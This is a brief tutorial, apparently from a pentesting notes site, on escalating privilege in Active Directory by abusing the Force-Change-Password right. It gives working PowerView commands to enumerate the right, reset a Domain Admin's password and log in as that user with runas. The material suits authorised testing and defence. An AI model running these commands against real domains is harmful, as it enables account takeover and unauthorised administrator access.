Force-Change-Password On User

Force-Change-Password

Force-Change-Password : Is a permission that allows you to change user’s password. If you have Force-Change-Password on user object, you can reset user’s password without knowing the current password of the user, thereby escalating your privileges.

Enumeration

PowerView

Force-Change-Password Enumeration

Get your current user’s sid by executing whoami /user, import powerview, then execute the below command to get the list of objects on which you have Force-Change-Password.

Command

get-objectacl -resolveguids | ? {($_.securityidentifier -eq "[your_current_user_sid]") -and ($_.objectacetype -eq "User-Force-Change-Password")}

below image shows the current user usman has Force-Change-Password. right on user object ali

User Enumeration

Execute the below command to get more information about the target user.

Command

get-netuser [target_user]

below image shows the target user ali is a member of Domain Admins

BloodHound

You can also get thesame result using bloodhound.

below image shows the current user usman has GenericAll right on user object ali who is a member of Domain Admins

Exploitation

PowerView

Reset Password

Since you have Force-Change-Password right on user ali, you can reset his password and login to his account by executing the below command

Command

$pass = ConvertTo-SecureString '[Your New Password Here]' -AsPlainText -Force
set-domainuserpassword -identity [target_user] -accountpassword $pass 
runas /user:[domain\user] cmd.exe

References

• https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2
• https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse